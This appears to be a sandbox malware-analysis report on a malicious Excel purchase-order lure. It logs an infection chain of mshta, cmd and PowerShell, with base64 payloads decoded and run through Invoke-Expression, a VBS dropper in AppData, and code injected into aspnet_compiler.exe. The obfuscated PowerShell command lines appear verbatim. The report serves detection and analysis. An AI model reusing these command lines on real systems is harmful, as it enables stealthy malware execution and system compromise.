              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
              Source: PO#BBGR2411PO69.xls Stream path 'MBD007009DB/MBD007203CB/Workbook' entropy: 7.97416832031 (max. 8.0)
              Source: PO#BBGR2411PO69.xls Stream path 'Workbook' entropy: 7.99849766453 (max. 8.0)
              Source: 09230000.0.dr Stream path 'MBD007009DB/MBD007203CB/Workbook' entropy: 7.97416832031 (max. 8.0)
              Source: 09230000.0.dr Stream path 'Workbook' entropy: 7.99844135628 (max. 8.0)
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 27_2_00AC0101 rdtsc 27_2_00AC0101
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 600000
              Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1536Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8392Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1166Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7777Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1270
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1565
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1421
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6156
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\r3q12jmu\r3q12jmu.dllJump to dropped file
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\xmqw35tj\xmqw35tj.dllJump to dropped file
              Source: C:\Windows\System32\mshta.exe TID: 3704 Thread sleep time: -360000s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3888 Thread sleep count: 1536 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3888 Thread sleep count: 8392 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3920 Thread sleep time: -120000s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3924 Thread sleep time: -1844674407370954s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2052 Thread sleep time: -60000s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2080 Thread sleep time: -6456360425798339s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2080 Thread sleep time: -3600000s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2080 Thread sleep time: -600000s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3156 Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\System32\mshta.exe TID: 748 Thread sleep time: -360000s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1316 Thread sleep count: 1270 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1316 Thread sleep count: 1565 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2148 Thread sleep time: -180000s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1212 Thread sleep time: -1844674407370954s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2176 Thread sleep time: -1844674407370954s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1132 Thread sleep count: 1421 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1132 Thread sleep count: 6156 > 30
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3572 Thread sleep time: -16602069666338586s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3616 Thread sleep time: -60000s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3572 Thread sleep time: -3000000s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3572 Thread sleep time: -600000s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1872 Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 3768 Thread sleep time: -30000s >= -30000s
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 3716 Thread sleep time: -30000s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 600000
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Process queried: DebugPort
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 27_2_00AC0101 rdtsc 27_2_00AC0101
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 27_2_00A707AC NtCreateMutant,LdrInitializeThunk,27_2_00A707AC
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 27_2_00A60080 mov ecx, dword ptr fs:[00000030h] 27_2_00A60080
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 27_2_00A600EA mov eax, dword ptr fs:[00000030h] 27_2_00A600EA
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 27_2_00A826F8 mov eax, dword ptr fs:[00000030h] 27_2_00A826F8
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug

              HIPS / PFW / Operating System Protection Evasion

              Source: Yara match File source: Process Memory Space: powershell.exe PID: 3108, type: MEMORYSTR
              Source: Yara match File source: Process Memory Space: powershell.exe PID: 3512, type: MEMORYSTR
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 value starts with: 4D5A
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 401000
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 7EFDE008
              Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/c pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'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'+[CHaR]0X22+'))')))"
              Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOWeRsHElL -EX bypaSs -nOP -W 1 -C DEVICEcReDenTialDePlOYMeNt ; INvOke-ExpREsSioN($(INvoKe-EXpREssion('[sYSTEM.tExt.ENCodIng]'+[cHaR]58+[cHAr]58+'utF8.gETsTrIng([sYSTEm.coNvErt]'+[CHaR]58+[ChAr]0X3A+'fromBaSe64striNg('+[ChaR]34+'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'+[CHaR]0X22+'))')))"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\r3q12jmu\r3q12jmu.cmdline"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seethebestmagicalthignsgivegoodfo.vbS"
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC5BF.tmp" "c:\Users\user\AppData\Local\Temp\r3q12jmu\CSC7CCBE632744241EDA0AD204CE9F5FD7D.TMP"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\xmqw35tj\xmqw35tj.cmdline"
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES1610.tmp" "c:\Users\user\AppData\Local\Temp\xmqw35tj\CSCD4982987C63C4803AF625DBF77F42E41.TMP"
              Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $caviloso = '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';$bernarda = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($caviloso));Invoke-Expression $bernarda
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.Cmdlets.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyModel.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_64\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper\6.1.0.0__31bf3856ad364e35\Microsoft.Security.ApplicationId.PolicyManagement.XmlHelper.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
